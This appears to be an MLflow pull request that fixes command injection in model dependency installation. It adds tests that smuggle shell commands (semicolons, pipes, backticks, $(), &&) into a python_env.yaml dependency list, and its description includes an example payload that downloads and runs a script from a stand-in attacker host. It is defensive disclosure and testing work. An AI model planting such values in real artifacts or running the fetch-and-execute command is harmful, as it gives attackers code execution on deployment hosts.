### PR TITLE
fix(security): prevent command injection via malicious model artifacts

### DIFF
--- a/tests/models/test_container.py
+++ b/tests/models/test_container.py
@@ -1,0 +1,233 @@
+"""
+Tests for mlflow.models.container module.
+
+Includes security tests for command injection prevention.
+"""
+
+import os
+from unittest import mock
+
+import pytest
+import yaml
+
+from mlflow.models.container import _install_model_dependencies_to_env
+from mlflow.utils import env_manager as em
+
+
+def _create_model_artifact(model_path, dependencies, build_dependencies=None):
+    """Helper to create a minimal model artifact for testing."""
+    with open(os.path.join(model_path, "MLmodel"), "w") as f:
+        yaml.dump(
+            {
+                "flavors": {
+                    "python_function": {
+                        "env": {"virtualenv": "python_env.yaml"},
+                        "loader_module": "mlflow.pyfunc.model",
+                    }
+                }
+            },
+            f,
+        )
+
+    with open(os.path.join(model_path, "requirements.txt"), "w") as f:
+        f.write("")
+
+    with open(os.path.join(model_path, "python_env.yaml"), "w") as f:
+        yaml.dump(
+            {
+                "python": "3.12",
+                "build_dependencies": build_dependencies or [],
+                "dependencies": dependencies,
+            },
+            f,
+        )
+
+
+def test_command_injection_via_semicolon_blocked(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["numpy; echo INJECTED > /tmp/test_injection_semicolon.txt; #"],
+    )
+
+    evidence_file = "/tmp/test_injection_semicolon.txt"
+    if os.path.exists(evidence_file):
+        os.remove(evidence_file)
+
+    with pytest.raises(Exception, match="Failed to install model dependencies"):
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+    assert not os.path.exists(evidence_file), "Command injection via semicolon succeeded!"
+
+
+def test_command_injection_via_pipe_blocked(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["numpy | echo INJECTED > /tmp/test_injection_pipe.txt"],
+    )
+
+    evidence_file = "/tmp/test_injection_pipe.txt"
+    if os.path.exists(evidence_file):
+        os.remove(evidence_file)
+
+    with pytest.raises(Exception, match="Failed to install model dependencies"):
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+    assert not os.path.exists(evidence_file), "Command injection via pipe succeeded!"
+
+
+def test_command_injection_via_backticks_blocked(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["`echo INJECTED > /tmp/test_injection_backtick.txt`"],
+    )
+
+    evidence_file = "/tmp/test_injection_backtick.txt"
+    if os.path.exists(evidence_file):
+        os.remove(evidence_file)
+
+    with pytest.raises(Exception, match="Failed to install model dependencies"):
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+    assert not os.path.exists(evidence_file), "Command injection via backticks succeeded!"
+
+
+def test_command_injection_via_dollar_parens_blocked(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["$(echo INJECTED > /tmp/test_injection_dollar.txt)"],
+    )
+
+    evidence_file = "/tmp/test_injection_dollar.txt"
+    if os.path.exists(evidence_file):
+        os.remove(evidence_file)
+
+    with pytest.raises(Exception, match="Failed to install model dependencies"):
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+    assert not os.path.exists(evidence_file), "Command injection via $() succeeded!"
+
+
+def test_command_injection_via_ampersand_blocked(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["numpy && echo INJECTED > /tmp/test_injection_ampersand.txt"],
+    )
+
+    evidence_file = "/tmp/test_injection_ampersand.txt"
+    if os.path.exists(evidence_file):
+        os.remove(evidence_file)
+
+    with pytest.raises(Exception, match="Failed to install model dependencies"):
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+    assert not os.path.exists(evidence_file), "Command injection via && succeeded!"
+
+
+def test_legitimate_package_install(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["pip"],
+        build_dependencies=[],
+    )
+
+    result = _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+    assert result == []
+
+
+def test_requirements_file_reference(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["-r requirements.txt"],
+        build_dependencies=["pip"],
+    )
+
+    with open(os.path.join(model_path, "requirements.txt"), "w") as f:
+        f.write("# empty requirements\n")
+
+    result = _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+    assert result == []
+
+
+def test_requirements_path_replacement(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["-r requirements.txt"],
+    )
+
+    with open(os.path.join(model_path, "requirements.txt"), "w") as f:
+        f.write("six\n")
+
+    with mock.patch("mlflow.models.container.Popen") as mock_popen:
+        mock_popen.return_value.wait.return_value = 0
+
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+        call_args = mock_popen.call_args[0][0]
+        assert isinstance(call_args, list), "Should use list args, not shell string"
+
+        assert "-r" in call_args
+        req_index = call_args.index("-r")
+        req_path = call_args[req_index + 1]
+        assert req_path == os.path.join(model_path, "requirements.txt")
+
+
+def test_no_shell_execution(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["pip"],
+    )
+
+    with mock.patch("mlflow.models.container.Popen") as mock_popen:
+        mock_popen.return_value.wait.return_value = 0
+
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+        call_args = mock_popen.call_args
+        assert isinstance(call_args[0][0], list)
+        assert call_args[1].get("shell") is not True
+
+
+def test_build_dependencies_processed(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["pip"],
+        build_dependencies=["setuptools", "wheel"],
+    )
+
+    with mock.patch("mlflow.models.container.Popen") as mock_popen:
+        mock_popen.return_value.wait.return_value = 0
+
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+        call_args = mock_popen.call_args[0][0]
+        assert "setuptools" in call_args
+        assert "wheel" in call_args
+        assert "pip" in call_args
+
+
+def test_package_name_with_requirements_substring_not_modified(tmp_path):
+    model_path = str(tmp_path)
+    _create_model_artifact(
+        model_path,
+        dependencies=["my-requirements.txt-parser", "requirements.txt-tools"],
+    )
+
+    with mock.patch("mlflow.models.container.Popen") as mock_popen:
+        mock_popen.return_value.wait.return_value = 0
+
+        _install_model_dependencies_to_env(model_path, env_manager=em.LOCAL)
+
+        call_args = mock_popen.call_args[0][0]
+        assert "my-requirements.txt-parser" in call_args
+        assert "requirements.txt-tools" in call_args
+        assert not any(model_path in arg for arg in call_args if "parser" in arg or "tools" in arg)


### PR DESCRIPTION
### Related Issues/PRs

https://github.com/mlflow/mlflow/issues/19582

### What changes are proposed in this pull request?

Fix command injection vulnerability in `_install_model_dependencies_to_env()` where dependency specifications from `python_env.yaml` were directly interpolated into a shell command without sanitization.

**Vulnerability Details:**
- **File**: `mlflow/models/container/__init__.py`, line 146
- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
- **Severity**: High (CVSS 3.1: 8.8)

An attacker who can supply a malicious model artifact could achieve arbitrary command execution by including shell metacharacters in the dependency list of `python_env.yaml`. For example:

```yaml
dependencies:
  - "numpy; curl https://attacker.com/malware.sh | sh; #"
```

When deployed with `env_manager=LOCAL`, this would execute the injected shell commands with the privileges of the serving container.

**Fix:**
- Replace shell execution with subprocess list arguments
- Use `shlex.split()` to properly parse dependency strings like `-r requirements.txt`
- Use `sys.executable` instead of hardcoded `python`
- Only replace `requirements.txt` when it's an exact match or path suffix (not when it's part of a package name)

**Before (vulnerable):**
```python
deps = " ".join(python_env.build_dependencies + python_env.dependencies)
deps = deps.replace("requirements.txt", os.path.join(model_path, "requirements.txt"))
Popen(["bash", "-c", f"python -m pip install {deps}"])
```

**After (safe):**
```python
pip_args = [sys.executable, "-m", "pip", "install"]
for dep in python_env.build_dependencies + python_env.dependencies:
    dep_args = shlex.split(dep)
    for i, arg in enumerate(dep_args):
        if arg == "requirements.txt" or arg.endswith("/requirements.txt"):
            dep_args[i] = os.path.join(model_path, "requirements.txt")
    pip_args.extend(dep_args)
Popen(pip_args)
```

### How is this PR tested?

- [ ] Existing unit/integration tests
- [x] New unit/integration tests
- [x] Manual tests

Added comprehensive test suite (`tests/models/test_container.py`) with 11 test cases:
- `test_command_injection_via_semicolon_blocked` - Tests `;` injection
- `test_command_injection_via_pipe_blocked` - Tests `|` injection
- `test_command_injection_via_backticks_blocked` - Tests backtick injection
- `test_command_injection_via_dollar_parens_blocked` - Tests `$()` injection
- `test_command_injection_via_ampersand_blocked` - Tests `&&` injection
- `test_legitimate_package_install` - Verifies normal packages still work
- `test_requirements_file_reference` - Verifies `-r requirements.txt` works
- `test_requirements_path_replacement` - Verifies path replacement
- `test_no_shell_execution` - Verifies subprocess uses list args, not shell
- `test_build_dependencies_processed` - Verifies build deps are included
- `test_package_name_with_requirements_substring_not_modified` - Verifies package names like `my-requirements.txt-parser` are not incorrectly modified

All tests pass.

### Does this PR require documentation update?

- [x] No. You can skip the rest of this section.
- [ ] Yes. I've updated:
  - [ ] Examples
  - [ ] API references
  - [ ] Instructions

### Release Notes

#### Is this a user-facing change?

- [ ] No. You can skip the rest of this section.
- [x] Yes. Give a description of this change to be included in the release notes for MLflow users.

**Security fix**: Fixed command injection vulnerability in model container initialization. Malicious model artifacts could previously execute arbitrary shell commands during deployment when using `env_manager=LOCAL`. Users who deploy untrusted models should upgrade immediately.

#### What component(s), interfaces, languages, and integrations does this PR affect?

Components

- [ ] `area/tracking`: Tracking Service, tracking client APIs, autologging
- [x] `area/models`: MLmodel format, model serialization/deserialization, flavors
- [ ] `area/model-registry`: Model Registry service, APIs, and the fluent client calls for Model Registry
- [x] `area/scoring`: MLflow Model server, model deployment tools, Spark UDFs
- [ ] `area/evaluation`: MLflow model evaluation features, evaluation metrics, and evaluation workflows
- [ ] `area/gateway`: MLflow AI Gateway client APIs, server, and third-party integrations
- [ ] `area/prompts`: MLflow prompt engineering features, prompt templates, and prompt management
- [ ] `area/tracing`: MLflow Tracing features, tracing APIs, and LLM tracing functionality
- [ ] `area/projects`: MLproject format, project running backends
- [ ] `area/uiux`: Front-end, user experience, plotting, JavaScript, JavaScript dev server
- [ ] `area/build`: Build and test infrastructure for MLflow
- [ ] `area/docs`: MLflow documentation pages

<a name="release-note-category"></a>

#### How should the PR be classified in the release notes? Choose one:

- [ ] `rn/none` - No description will be included. The PR will be mentioned only by the PR number in the "Small Bugfixes and Documentation Updates" section
- [ ] `rn/breaking-change` - The PR will be mentioned in the "Breaking Changes" section
- [ ] `rn/feature` - A new user-facing feature worth mentioning in the release notes
- [x] `rn/bug-fix` - A user-facing bug fix worth mentioning in the release notes
- [ ] `rn/documentation` - A user-facing documentation change worth mentioning in the release notes

#### Should this PR be included in the next patch release?

- [x] Yes (this PR will be cherry-picked and included in the next patch release)
- [ ] No (this PR will be included in the next minor release)

This is a security fix and should be included in the next patch release to protect users deploying untrusted models.
